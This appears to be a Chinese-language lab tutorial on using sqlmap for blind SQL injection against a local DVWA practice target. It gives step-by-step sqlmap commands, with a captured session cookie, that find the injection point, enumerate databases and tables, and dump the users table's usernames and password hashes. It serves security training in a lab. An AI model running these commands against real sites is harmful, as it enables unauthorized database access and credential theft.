目录
环境工具
使用phpstudy搭建的DVWA靶场SQL盲注
burpsuite
sqlmap
一、下载安装sqlmap
下载安装sqlmap https://javaforall.cn/126449.html
二、攻击步骤
1.修改靶场级别
修改DVWA靶场的安全级别为Low
2.获取cookie
- 合法输入2,页面正常回显
- 由于需要cookie值,使用burpsuite进行抓包获取cookie
3.寻找注入点
python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch
4.查看数据库信息
python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch --dbs
5.查看当前数据库名称
python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch --current-db
6.查看数据库中所有的表
python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch -D dvwa --tables
7.查看users表中的字段
python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch -D dvwa -T users --columns
8.爆破users表中特殊字段的信息
python sqlmap.py -u “http://192.168.209.143/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#” --cookie=“PHPSESSID=qurf60l2alrquvlvk1t7t66kf2; security=low” --batch -D dvwa -T users -C “user,password” --dump
总结
本章介绍了sqlmap关于get注入的使用步骤以及攻击的相关语句。